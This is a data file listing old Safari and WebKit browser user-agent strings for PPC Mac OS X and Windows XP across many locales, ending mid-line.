(Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.4 (KHTML, like Gecko) Safari/100\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.5.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6.2 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6.2 (KHTML, like Gecko) Safari/412.2.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.11 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.3+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-au) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en_CA) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-ca) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en_CA) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-gb) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-gb) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/124 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en_US) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/412 Privoxy/3.0\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.6 (KHTML, like Gecko) Version/3.0.3 Safari/523.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es-ES) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fi-fi) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fi-fi) AppleWebKit/420+ (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ca) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/124 (KHTML, like Gecko) Safari/125.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nb-no) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.11 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; pt-pt) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; tr-tr) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/534.34 (KHTML, like Gecko) Dooble/1.40 Safari/534.34\nMozilla/5.0 (Windows; U; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.0; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; ca-es) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.29\nMozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; da) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; da-DK) AppleWebKit/523.11.1+ (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; da-dk) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; da-DK) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; de) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; el) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.4.1+ (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525+ (KHTML, like Gecko) Version/3.1.1 Safari/525.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; fi-FI) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr) AppleWebKit/522.15.5 (KHTML, like Gecko) Version/3.0.3 Safari/522.15.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; hr) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; id) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; it) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/525+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; ko-KR) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; nb) AppleWebKit/522.11.3 (KHTML, like Gecko) Version/3.0 Safari/522.11.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO) AppleWebKit/525.28 